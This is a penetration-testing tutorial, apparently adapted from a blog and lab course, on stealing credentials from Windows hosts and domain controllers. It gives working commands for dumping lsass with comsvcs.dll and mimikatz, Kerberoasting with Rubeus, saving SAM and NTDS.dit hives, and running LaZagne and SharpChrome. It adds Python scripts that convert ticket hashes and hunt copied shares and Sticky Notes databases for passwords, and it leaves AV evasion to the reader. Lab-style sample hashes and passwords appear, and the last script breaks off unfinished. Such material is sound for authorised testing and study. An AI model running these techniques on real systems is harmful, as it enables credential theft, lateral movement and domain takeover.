During a penetration test we will sooner or later compromise a domain-joined Windows host. At that point, harvesting the credentials present on that host is a priority: credentials cached on one machine are routinely trusted elsewhere in the domain, and they are the raw material for lateral movement.
Extracting credentials from an lsass.exe DMP file
lsass.exe (Local Security Authority Subsystem Service) is the Windows process that handles authentication and credential management, so its memory usually contains what we are after: NT hashes, Kerberos keys and tickets, and occasionally plaintext. The goal of this section is therefore to obtain a copy of that memory. Doing so requires local administrator rights (strictly, SeDebugPrivilege, which administrators hold), and both the dump itself and the tools that read it are well known to AV/EDR.
Dumping lsass memory with a desktop session
Open Task Manager (it must be running elevated, otherwise the dump fails with access denied), find "Local Security Authority Process" on the Processes tab or lsass.exe on the Details tab, and right-click it.
Click "Create dump file". Task Manager writes the dump to the current user's temp directory and shows the full path in the confirmation dialog (typically C:\Users\<user>\AppData\Local\Temp\lsass.DMP).
That is all there is to it.
The remaining steps are to move the dump to our VPS and parse it with pypykatz. Parsing is covered in a later section; for transfer methods see the earlier post "Penetration testing: file transfer methods on Windows" (CSDN blog).
Dumping lsass from a command line
Without a desktop we can create the DMP file with rundll32.exe and the MiniDump export of comsvcs.dll. One clarification: rundll32.exe itself is a signed Microsoft binary, not malware. What modern detection tools flag is this specific use of it (rundll32 loading comsvcs.dll and opening a handle to lsass), so expect the command below to be detected or blocked unless you have done evasion work of your own.
Find the LSASS PID
tasklist /svc
PS C:\Windows\system32> Get-Process lsass
Create the DMP file from PowerShell
Replace the PID argument (672 below) with the PID found above and run from an elevated shell. From an AV point of view this is malicious activity; evading detection is left to you.
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
As before, move the dump to the VPS and parse it with pypykatz (next section); for transfer methods see "Penetration testing: file transfer methods on Windows" (CSDN blog).
Parsing the lsass dump
Parsing is straightforward. pypykatz ships with Kali; if it fails to run, uninstall it and reinstall it with pip.
pypykatz lsa minidump /home/peter/Documents/lsass.dmp
Contents of the DMP
A parsed lsass dump usually contains a lot of material. Some examples follow; each block corresponds to the authentication package (SSP) that cached the credential.
MSV
sid S-1-5-21-4019466498-1700476312-3544718034-1001
luid 1354633
== MSV ==
Username: bob
Domain: DESKTOP-33E7O54
LM: NA
NT: 64f12cddaa88057e06a81b54e73b949b
SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
DPAPI: NA
WDIGEST
== WDIGEST [14ab89]==
username bob
domainname DESKTOP-33E7O54
password None
password (hex)
Kerberos
== Kerberos ==
Username: bob
Domain: DESKTOP-33E7O54
DPAPI
DPAPI (Data Protection API) is the Windows interface that the operating system and third-party applications use to encrypt and decrypt secrets under the user's logon credentials. The master keys cached in lsass are what let us decrypt data those applications protected with it.
== DPAPI [14ab89]==
luid 1354633
key_guid 3e1d1091-b792-45df-ab8e-c66af044d69b
masterkey e8bc2faf77e7bd1891c0e49f0dea9d447a491107ef5b25b9929071f68db5b0d55bf05df5a474d9bd94d98be4b4ddb690e6d8307a86be6f81be0d554f195fba92
sha1_masterkey 52e758b6120389898f7fae553ac8172b43221605
Application | Use of DPAPI
---|---
Internet Explorer | Password form auto-completion data (username and password for saved sites).
Google Chrome | Password form auto-completion data (username and password for saved sites).
Outlook | Passwords for email accounts.
Remote Desktop Connection | Saved credentials for connections to remote machines.
Credential Manager | Saved credentials for accessing shared resources, joining wireless networks, VPNs and more.
Automated approach
nxc smb -u <username> -p <password> --lsa
Be precise about what this flag does: --lsa dumps the LSA secrets stored in the registry (cached domain logons, service-account and scheduled-task passwords, the machine account password), which is not the same as reading lsass memory. For a remote lsass dump NetExec has the lsassy module (-M lsassy) instead.
Stealing credentials from lsass memory directly
Searching Windows memory for credentials with mimikatz
With a desktop session, double-click mimikatz and first acquire SeDebugPrivilege (the command must answer Privilege '20' OK, which needs an elevated shell):
privilege::debug
Extract NTLM hashes (plus any WDigest or plaintext passwords still cached)
sekurlsa::logonpasswords
From a command line
mimikatz.exe privilege::debug "sekurlsa::logonpasswords" exit
Extracting tickets from Windows with mimikatz
sekurlsa::tickets /export
Extracting Kerberos keys from Windows with mimikatz
sekurlsa::ekeys
Extracting crackable TGS tickets from Windows with mimikatz
#Turn this on first so mimikatz prints tickets as Base64 to the console instead of writing .kirbi files to disk
mimikatz # base64 /out:true
#List the tickets in the current logon session. The crackable ones are service tickets (TGS) issued for accounts with an SPN (Kerberoasting); the TGT itself is not crackable this way
mimikatz # kerberos::list /export
#Copy the Base64 blob of the ticket of interest and rebuild the .kirbi file on the attack box
cmundy2@htb[/htb]$ echo "<base64 blob>" | tr -d \\n > encoded_file
cmundy2@htb[/htb]$ cat encoded_file | base64 -d > sqldev.kirbi
#Convert for cracking with John (writes its output to crack_file)
python2.7 kirbi2john.py sqldev.kirbi
#Rewrite the John format into hashcat mode 13100. The 23 is the RC4-HMAC etype; an AES-encrypted ticket needs mode 19600/19700 and this substitution would produce a line that never cracks
cmundy2@htb[/htb]$ sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
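The sed one-liner above is opaque, and it happily emits a line that hashcat will reject or never crack if the input differs from what it expects. The same conversion in Python, with validation of the resulting mode-13100 line, follows. This is an added example, not code from the original post or from the kirbi2john/hashcat projects. It assumes the input line has the shape the sed expression expects, "$krb5tgs$<label>:<checksum>$<edata2>", and that the ticket is RC4-HMAC (etype 23); the sample hash values in the usage are constructed.

```python
"""
Convert a Kerberoast hash from the John layout written by kirbi2john.py
(crack_file) into hashcat mode 13100 and sanity-check the result before
spending GPU time on it.

Assumptions (not taken from the page):
  * the input line looks like "$krb5tgs$<label>:<checksum>$<edata2>";
  * the service ticket is RC4-HMAC (etype 23), which is what the "23" in
    "$krb5tgs$23$" asserts. An AES ticket (etype 17/18) belongs in mode
    19600/19700; relabelling it as 13100 gives hashcat a line it will
    chew on and never crack.
The text between the asterisks (user$realm$spn) is informational only;
hashcat cracks against the checksum and edata2, which is why the sed can
put a file name there instead.
"""
import re

# Same split as sed's greedy \(.*\):\(.*\): the label is everything up to the LAST colon.
JOHN_RE = re.compile(r"^\$krb5tgs\$(?P<label>.*):(?P<data>.*)$")

# hashcat 13100 layout: $krb5tgs$23$*user$realm$spn*$<16-byte HMAC-MD5 checksum, hex>$<edata2, hex>
HASHCAT_13100_RE = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<ident>[^*]+)\*\$"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata2>[0-9a-fA-F]+)$"
)


def john_to_hashcat(line):
    """$krb5tgs$LABEL:DATA  ->  $krb5tgs$23$*LABEL*$DATA (what the sed one-liner does)."""
    m = JOHN_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$<label>:<data> line")
    return f"$krb5tgs$23$*{m['label']}*${m['data']}"


def build_13100(user, realm, spn, checksum_hex, edata2_hex):
    """Assemble a 13100 line from fields you parsed out of a KRB-CRED yourself."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum_hex}${edata2_hex}"


def validate_13100(line):
    """Reject lines hashcat would refuse (bad layout) or that cannot be a real ticket (odd hex)."""
    m = HASHCAT_13100_RE.match(line.strip())
    if not m:
        raise ValueError("does not match the hashcat 13100 layout")
    edata2 = m["edata2"]
    if len(edata2) % 2:
        raise ValueError("edata2 is not a whole number of bytes")
    return {
        "ident": m["ident"],
        "checksum": m["checksum"].lower(),
        "edata2_bytes": len(edata2) // 2,
    }


if __name__ == "__main__":
    # Constructed sample: a kirbi2john-style line for the sqldev.kirbi ticket above.
    sample = "$krb5tgs$sqldev.kirbi:63386d22d359fe42230300d56852c9eb$" + "891ad31d09ab89c6" * 8
    converted = john_to_hashcat(sample)
    print(converted)
    print(validate_13100(converted))
```

Feed the converted line to hashcat -m 13100; if validate_13100 raises, fix the input rather than the hash, because a malformed line costs a cracking run and tells you nothing.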
Extracting TGS tickets with Rubeus
#Dump the tickets held in memory (an elevated context is needed to see other users' logon sessions)
c:\tools> Rubeus.exe dump /nowrap
#List the tickets currently in memory
c:\tools> Rubeus.exe klist /nowrap
Extracting TGS tickets for privileged accounts with Rubeus
#Request service tickets only for accounts with admincount=1
PS C:\htb> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
#Request a service ticket for one account; /tgtdeleg pushes the KDC to issue an RC4-encrypted ticket where it still honours that (RC4 cracks far faster than AES)
PS C:\Users\htb-student\Desktop>.\Rubeus.exe kerberoast /tgtdeleg /user:testspn /nowrap
Automated credential search with lazagne.exe
LaZagne is flagged by AV as malicious; getting it past detection is your own problem.
Release: LaZagne v2.4.6 (AlessandroZ/LaZagne on GitHub)
C:\Users\bob\Desktop> start lazagne.exe all
Extracting credentials from the SAM database
The SAM database holds the hashes of the local accounts. It is most obviously useful on workgroup hosts, but it matters on domain-joined machines too: a local administrator password reused across the estate gives the same lateral movement as a domain credential. Reading it needs administrator rights, and we take it from the registry rather than the locked file on disk.
On-disk file: %SystemRoot%\system32\config\SAM
Registry hive: HKLM\SAM
###Check the ACL on the SAM file with icacls (only SYSTEM and Administrators should have access)
C:\htb> icacls c:\Windows\System32\config\SAM
Copy the SAM database (save the registry hives)
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
The operation completed successfully.
Transfer the hive files
See "Penetration testing: file transfer methods on Windows" (CSDN blog).
Parse the SAM database
The SYSTEM hive is the important one: without it the SAM cannot be decrypted. The reason is in the table below.
Registry hive | Description
---|---
hklm\sam | Contains the hashes of the local account passwords. We need these to crack them (or pass them) and get access as those local users.
hklm\system | Contains the system boot key, which encrypts the SAM database. We need the boot key to decrypt the SAM.
hklm\security | Contains cached credentials for domain accounts (and the LSA secrets). Worth taking from a domain-joined target.
Extract hashes from the SAM database
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Automated approach
nxc smb -u <username> -p <password> --sam
Credentials from files
This one is simple: we look for configuration files and documents that contain credentials. It is fast information gathering, and the following keywords tend to lead to hits:
- Passwords, Passphrases, Keys
- Username, User account, Creds
- Users, Passkeys
- configuration, dbcredential, dbpassword
- pwd, Login, Credentials
Places where passwords tend to live:
- Passwords in Group Policy in the SYSVOL share
- Passwords in scripts in the SYSVOL share
- Password in scripts on IT shares
- Passwords in web.config files on dev machines and IT shares
- unattend.xml
- Passwords in the AD user or computer description fields
- KeePass databases --> pull hash, crack and get loads of access.
- Found on user systems and shares
- Files such as pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, Sharepoint
Searching for configuration files on Windows
###Filter by content
C:\ findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
#Show file names only
C:\htb> cd c:\Users\htb-student\Documents & findstr /SI /M "password" *.xml *.ini *.txt
stuff.txt
#Print the matching lines
C:\htb> findstr /si password *.xml *.ini *.txt *.config
stuff.txt:password: l#-x9r11_2_GL!
#Match every extension, with line numbers
C:\htb> findstr /spin "password" *.*
stuff.txt:1:password: l#-x9r11_2_GL!
#PowerShell equivalent
PS C:\htb> select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password
stuff.txt:1:password: l#-x9r11_2_GL!
###Filter by file name
dir /b /s *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml *.7z *.db *.tar.gz *.tar *.zip *.rar *.gz *.bz2 *.xz *.tar.xz *.tar.bz2 *.iso *.img *.cab *.tgz *.zst *.lzma *.arj *.apk *.deb *.rpm *.jar *.war *.ear *.cpio *.vhd *.vhdx *.dmg *.sitx *.lz4 *.hqx *.ace *.cbr *.cbz
#Archives
dir /b /s *.7z *.tar.gz *.tar *.zip *.rar *.gz *.bz2 *.xz *.tar.xz *.tar.bz2 *.iso *.img *.cab *.tgz *.zst *.lzma *.arj *.apk *.deb *.rpm *.jar *.war *.ear *.cpio *.vhd *.vhdx *.dmg *.sitx *.lz4 *.hqx *.ace *.cbr *.cbz
#Configuration files
dir /b /s *.ini *.conf *.cfg *.yaml *.yml *.json *.xml *.toml *.env *.properties *.cnf *.plist *.htaccess *.config *.desktop *.reg *.prefs *.rc *.srv *.lst *.options *.txt *.bashrc *.zshrc *.profile *.gitconfig *.npmrc *.editorconfig
#User notes (patterns to pass to dir /b /s)
*.md *.txt *.doc *.docx *.rtf *.odt *.log *.nfo *.html *.xml *.json *.yaml *.yml *.csv *.pdf *.note *.journal *.one *.enex *.db *.sqlite *.gdoc *.gslides *.gnotes *.obsidian *.tex *.markdown *.asciidoc
#Database files (patterns to pass to dir /b /s)
*.db *.sqlite *.sqlite3 *.sdb *.mdb *.accdb *.ndf *.mdf *.ldf *.sql *.bak *.frm *.ibd *.myd *.myi *.cdb *.gdb *.kdb *.kdbx *.dbf *.ora *.dmp *.dat *.fdb *.nsf *.vdb *.psafe3 *.edb *.log
#Script files (patterns to pass to dir /b /s)
*.sh *.bash *.zsh *.ps1 *.psm1 *.bat *.cmd *.vbs *.js *.py *.rb *.pl *.php *.lua *.awk *.sed *.dts *.ks *.reg *.scpt *.command *.ts *.coffee *.racket *.scm *.erl *.tcl *.plg *.html *.css *.json
#Search by name fragments (pass, cred, vnc, config)
C:\htb> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
c:\inetpub\wwwroot\web.config
#Recursive search for one extension with where
C:\htb> where /R C:\ *.config
c:\inetpub\wwwroot\web.config
#PowerShell: recursive search for several extensions at once
PS C:\htb> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
Directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/25/2021 9:59 AM 329 web.config
Searching by content on a mapped share from Windows
findstr /s /i cred n:\*.*
Searching by file name in PowerShell
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Searching by content in PowerShell
Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
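The findstr, dir and Get-ChildItem one-liners above are what you type on the target; once a share or a user profile has been copied to the attack box, the same hunt is easier to do offline with a small script that handles the things the one-liners do not: one case-insensitive regex covering several keyword forms, an extension allow-list, a size cap so a stray pagefile is never read, UTF-16 files (unattend.xml and files written by PowerShell are often UTF-16 with a BOM, and a UTF-8 grep silently misses their contents), and structured results you can triage. This is an added example, not code from the original post; the files that build_sample_tree() creates are constructed for the demo and mirror the web.config and stuff.txt finds shown above.

```python
"""
Offline credential hunt over a directory tree (Python stand-in for the
findstr / dir / Get-ChildItem one-liners). Added example; sample data is
constructed.
"""
import os
import re
import tempfile
from pathlib import Path

# Keyword forms seen in config files, scripts and notes ("password=", "pwd:",
# "connectionString=") plus XML tags such as <Password> in unattend.xml.
CRED_RE = re.compile(
    r"\b(?:password|passwd|pwd|passphrase|secret|credentials?|connectionstring)\s*[:=]"
    r"|<(?:password|adminpassword|autologon)\b",
    re.I,
)
INTERESTING_EXTS = {".txt", ".ini", ".cfg", ".config", ".xml", ".ps1", ".yml",
                    ".yaml", ".json", ".bat", ".cmd", ".rdp", ".vnc", ".cred"}
MAX_BYTES = 5 * 1024 * 1024   # skip anything larger (pagefile, disk images, logs)


def read_text(path):
    """Decode by BOM: UTF-16 files are common on Windows and break a UTF-8 grep."""
    data = path.read_bytes()
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16", errors="ignore")
    if data.startswith(b"\xef\xbb\xbf"):
        data = data[3:]
    return data.decode("utf-8", errors="ignore")


def scan_tree(root, pattern=CRED_RE, exts=INTERESTING_EXTS, max_bytes=MAX_BYTES):
    """Return [(path, line_number, line)] for every matching line under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.suffix.lower() not in exts:
                continue
            try:
                if p.stat().st_size > max_bytes:
                    continue
                text = read_text(p)
            except OSError:
                continue                      # ACL denied or locked: skip, keep walking
            for lineno, line in enumerate(text.splitlines(), 1):
                if pattern.search(line):
                    hits.append((str(p), lineno, line.strip()))
    return hits


def build_sample_tree():
    """Constructed sample tree: an IIS web.config, a user's stuff.txt, a UTF-16 unattend.xml."""
    root = Path(tempfile.mkdtemp(prefix="credhunt_"))
    web = root / "inetpub" / "wwwroot"
    web.mkdir(parents=True)
    (web / "web.config").write_text(
        '<connectionStrings>\n'
        '  <add name="db" connectionString="Server=SQL01;User Id=svc_web;Password=Summer2021!" />\n'
        '</connectionStrings>\n', encoding="utf-8")
    (root / "stuff.txt").write_text("todo\npassword: l#-x9r11_2_GL!\n", encoding="utf-8")
    # UTF-16 with BOM, the way Windows tooling typically writes unattend.xml
    (root / "unattend.xml").write_text(
        "<AutoLogon><Password><Value>UABhAHMAcwB3AG8AcgBkADEAMgAzAA==</Value></Password></AutoLogon>\n",
        encoding="utf-16")
    (root / "app.log").write_text("password=not_scanned_extension\n", encoding="utf-8")
    (root / "readme.txt").write_text("nothing sensitive here\n", encoding="utf-8")
    return root


if __name__ == "__main__":
    for path, lineno, line in scan_tree(build_sample_tree()):
        print(f"{path}:{lineno}: {line}")
```

Point scan_tree at the copied share or profile directory; the .log file above is deliberately left out of the hits to show that the extension allow-list, not the content, decides what is read, so widen INTERESTING_EXTS when the target keeps secrets in odd file types.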
NTDS.dit
The domain controller's database; it holds everything sensitive in the domain:
- user accounts (user names and password hashes)
- group accounts
- computer accounts
- Group Policy objects
Getting NTDS.dit manually
NTDS.dit is held open by the DC while it runs, so we take it from a Volume Shadow Copy. Create a shadow copy of the volume holding NTDS (requires administrator rights on the DC):
*Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C:
Copy NTDS.dit out of the shadow copy (the shadow copy index, HarddiskVolumeShadowCopy2 here, comes from the output of the previous command)
*Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
NTDS.dit is encrypted with the same boot key as the SAM, so also save the SYSTEM hive (reg.exe save hklm\system, as in the SAM section) or secretsdump will not be able to decrypt it.
Getting NTDS.dit manually with diskshadow
###Run diskshadow.exe
PS C:\htb> diskshadow.exe
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC, 10/14/2020 12:57:52 AM
###Create the shadow copy and expose it as drive E:
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
###Copy ntds.dit from the shadow copy to C:
PS C:\htb> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Copied 16777216 bytes
Copy-FileSeBackupPrivilege is not a built-in cmdlet: it comes from the SeBackupPrivilege PowerShell module (giuliano108/SeBackupPrivilege on GitHub) and reads the file under SeBackupPrivilege, which is what lets a member of Backup Operators copy it despite the ACL. As a full administrator a plain copy from the exposed drive works as well.
Automated approach
nxc smb -u <username> -p <password> --ntds
Sniffing with Inveigh
Run Inveigh on the foothold to capture NetNTLM hashes from LLMNR/NBT-NS/mDNS name resolution on the local segment.
Chrome
Another interesting case is spell-check dictionaries. Sensitive data such as passwords gets typed into email clients and browser-based applications, which underline any word they do not recognise; users add those words to the custom dictionary to get rid of the red underline, and the password ends up in a plaintext file.
###Harvest the Chrome custom dictionary
PS C:\htb> gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
Password1234!
###Harvest the browser's saved logins. SharpChrome decrypts them with the user's DPAPI keys; it is a well-known offensive tool and likely to be flagged by AV/EDR, so weigh that against the need for stealth before running it.
PS C:\htb> .\SharpChrome.exe logins /unprotect
PowerShell history
###Locate the PowerShell (PSReadLine) history file
PS C:\htb> (Get-PSReadLineOption).HistorySavePath
###Read the PowerShell history
PS C:\htb> gc (Get-PSReadLineOption).HistorySavePath
###Read the history of every user profile the current user can access (other users' profiles need administrator rights)
PS C:\htb> foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
PowerShell credentials
###Typical situation: a developer's Connect-VC.ps1 saved a PSCredential to XML with Export-Clixml. The password inside is a SecureString protected with DPAPI under the saving user's logon secret, so it can only be decrypted by that same user on that same machine.
# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
###An attacker running as bob_adm on that host can therefore recover the plaintext
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword
Virtual machine and key files
Other extensions worth hunting for: .kdbx (KeePass databases), .vmdk and .vhdx (virtual machine disks, which can be mounted offline to pull their SAM or NTDS), .ppk (PuTTY private keys), and so on.
*kdbx* *.vmdk* *.vhdx* *.ppk* *.vbs*
dir /b /s *sqlite* *kdbx* *vmdk* *vhdx* *ppk*
Sticky Notes database
Sticky Notes keeps its content in a SQLite database (plum.sqlite). Download it to the attack box and parse it there; take the plum.sqlite-wal and plum.sqlite-shm files along with it, because the main file on its own can be stale.
Parsing tools:
DB Browser for SQLite (downloads page) and PSSQLite (GitHub - RamblingCookieMonster/PSSQLite: PowerShell module to query SQLite databases)
PS C:\htb> ls
Directory: C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/25/2021 11:59 AM 20480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session
-a---- 5/25/2021 11:59 AM 982 Ecs.dat
-a---- 5/25/2021 11:59 AM 4096 plum.sqlite
-a---- 5/25/2021 11:59 AM 32768 plum.sqlite-shm
-a---- 5/25/2021 12:00 PM 197792 plum.sqlite-wal
###Find SQLite files
dir /S /B *sqlite*
###Relax the execution policy for this process only
PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
###Import PSSQLite.psd1
PS C:\htb> cd .\PSSQLite\
PS C:\htb> Import-Module .\PSSQLite.psd1
###Query the SQLite file
PS C:\htb> $db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
Text
----
\id=de368df0-6939-4579-8d38-0fda521c9bc4 vCenter
\id=e4adae4c-a40b-48b4-93a5-900247852f96
\id=1a44a631-6fff-4961-a4df-27898e9e1e65 root:Vc3nt3R_adm1n!
\id=c450fc5f-dc51-4412-b4ac-321fd41c522a Thycotic demo tomorrow at 10am
###Parse the SQLite file on Kali
#Dump the printable strings from the file; note text is stored in plaintext, so it shows up here (for a structured view use sqlite3 or DB Browser)
cmundy2@htb[/htb]$ strings plum.sqlite
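strings gives a flat dump; when there are hundreds of notes you want the Note table parsed properly and the credential-looking entries pulled out. The script below does that with Python's built-in sqlite3 module, as an added example that is not code from the original post. It also bakes in the caveat the directory listing above hints at: plum.sqlite is 4 KB while plum.sqlite-wal is 197 KB, because Sticky Notes runs SQLite in WAL mode and recent notes sit in the -wal file until a checkpoint, so the three files are copied together before the database is opened. make_sample_db() builds a constructed stand-in for plum.sqlite with only a Note.Text column (the real schema has many more columns) whose rows use the same "\id=<guid> <text>" shape as the query output above.

```python
"""
Parse a Sticky Notes plum.sqlite offline and flag credential-looking notes.
Added example; the sample database is constructed, not a real plum.sqlite.
"""
import re
import shutil
import sqlite3
import tempfile
from pathlib import Path

# Sticky Notes prefixes each note body with "\id=<guid> ".
NOTE_RE = re.compile(r"^\\id=([0-9a-f-]{36})\s?(.*)$", re.S)
# user:secret tokens (root:Vc3nt3R_adm1n!) or "password"/"pass" followed by : or =
CRED_RE = re.compile(r"(?:^|\s)[\w.@\\-]+:\S{6,}(?:\s|$)|pass(?:word)?\s*[:=]", re.I)


def copy_with_wal(db_path):
    """Copy plum.sqlite plus its -wal and -shm siblings into a scratch dir and return the copy."""
    db_path = Path(db_path)
    work = Path(tempfile.mkdtemp(prefix="plum_"))
    for suffix in ("", "-wal", "-shm"):
        src = db_path.with_name(db_path.name + suffix)
        if src.exists():
            shutil.copy2(src, work / src.name)
    return work / db_path.name


def extract_notes(db_path):
    """Return [{'id': guid or None, 'text': note body}] from the Note table."""
    work = copy_with_wal(db_path)
    con = sqlite3.connect(str(work))
    try:
        rows = con.execute("SELECT Text FROM Note ORDER BY rowid").fetchall()
    finally:
        con.close()
    notes = []
    for (text,) in rows:
        m = NOTE_RE.match(text or "")
        notes.append({"id": m.group(1), "text": m.group(2)} if m
                     else {"id": None, "text": text or ""})
    return notes


def find_credentials(notes):
    """Notes whose body looks like user:password or contains a password keyword."""
    return [n for n in notes if CRED_RE.search(n["text"])]


def make_sample_db():
    """Constructed plum.sqlite in WAL mode holding the four notes shown on the page."""
    path = Path(tempfile.mkdtemp(prefix="stickynotes_")) / "plum.sqlite"
    con = sqlite3.connect(str(path))
    con.execute("PRAGMA journal_mode=WAL")
    con.execute("CREATE TABLE Note (Id TEXT, Text TEXT)")
    rows = [
        ("de368df0-6939-4579-8d38-0fda521c9bc4", "vCenter"),
        ("e4adae4c-a40b-48b4-93a5-900247852f96", ""),
        ("1a44a631-6fff-4961-a4df-27898e9e1e65", "root:Vc3nt3R_adm1n!"),
        ("c450fc5f-dc51-4412-b4ac-321fd41c522a", "Thycotic demo tomorrow at 10am"),
    ]
    con.executemany("INSERT INTO Note VALUES (?, ?)",
                    [(i, f"\\id={i} {t}" if t else f"\\id={i}") for i, t in rows])
    con.commit()
    con.close()
    return path


if __name__ == "__main__":
    for note in find_credentials(extract_notes(make_sample_db())):
        print(note["id"], note["text"])
```

Run it against the real LocalState directory by passing the path of plum.sqlite to extract_notes; if the -wal file is missing from what you exfiltrated and the Note table comes back nearly empty, go back for it.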
Credentials saved with cmdkey
Servers often hold credentials saved by other users in Credential Manager; we can use them to run commands as those users without ever learning the password.
###List saved credentials
C:\htb> cmdkey /list
Target: LegacyGeneric:target=TERMSRV/SQL01
Type: Generic
User: inlanefreight\bob
###Use a saved credential (runas /savecred pulls it from the vault; the password itself is not shown)
PS C:\htb> runas /savecred /user:inlanefreight\bob "COMMAND HERE"
Password managers
KeePass hashes
###Find .kdbx files
dir /s /b *.kdbx
###Extract the master password hash from the KeePass database
cmundy2@htb[/htb]$ python2.7 keepass2john.py ILFREIGHT_Help_Desk.kdbx
###Crack it with hashcat (mode 13400) or John
https://blog.csdn.net/weixin_44368093/article/details/143445069
Email
MailSniper gives a fast search over mailboxes; search for terms such as pass, creds and credentials.
Automated collection with LaZagne
This tool is detected by AV; bypassing that is up to you.
PS C:\htb> .\lazagne.exe -h
PS C:\htb> .\lazagne.exe all
Extracting saved protocol credentials with SessionGopher
###Search (SessionGopher collects saved PuTTY, WinSCP, FileZilla, SuperPuTTY and RDP sessions; targeting a remote host needs administrator rights there)
PS C:\htb> Import-Module .\SessionGopher.ps1
PS C:\Tools> Invoke-SessionGopher -Target WINLPE-SRV01
Registry discovery
Windows autologon
###Enumerate the Winlogon autologon values (look for AutoAdminLogon, DefaultUserName and DefaultPassword)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
###Enumerate PuTTY sessions in the registry (proxy credentials are stored in plaintext)
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
Present REG_DWORD 0x1
HostName REG_SZ
LogFileName REG_SZ putty.log
<SNIP>
ProxyDNS REG_DWORD 0x1
ProxyLocalhost REG_DWORD 0x0
ProxyMethod REG_DWORD 0x5
ProxyHost REG_SZ proxy
ProxyPort REG_DWORD 0x50
ProxyUsername REG_SZ administrator
ProxyPassword REG_SZ 1_4m_th3_@cademy_4dm1n!
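Both registry checks above (Winlogon autologon and PuTTY sessions) come back as reg query text, and on an engagement you end up with dozens of such dumps. The parser below turns that text into a dictionary, converts REG_DWORD values to integers, flags values whose names suggest a credential, and checks whether autologon is actually armed (AutoAdminLogon set to 1 with a DefaultPassword present). This is an added example, not code from the original post. The embedded SAMPLE is constructed: the PuTTY part mirrors the listing above, while the Winlogon block, its account name and its password are made up for the demo.

```python
"""
Parse `reg query` output and pick out credential-bearing values.
Added example; SAMPLE is constructed test data.
"""
import re

# Under each key path line, reg query prints "    <name>    <type>    <value>".
VALUE_RE = re.compile(
    r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_(?:SZ|EXPAND_SZ|MULTI_SZ|DWORD|QWORD|BINARY))"
    r"(?:\s{2,}(?P<value>.*))?\s*$"
)
KEY_RE = re.compile(r"^HKEY_[A-Z_]+\\")
SECRET_NAME_RE = re.compile(r"pass|pwd|secret|key", re.I)


def parse_reg_query(text):
    """Return {key_path: {value_name: (reg_type, value)}}; DWORD/QWORD become ints."""
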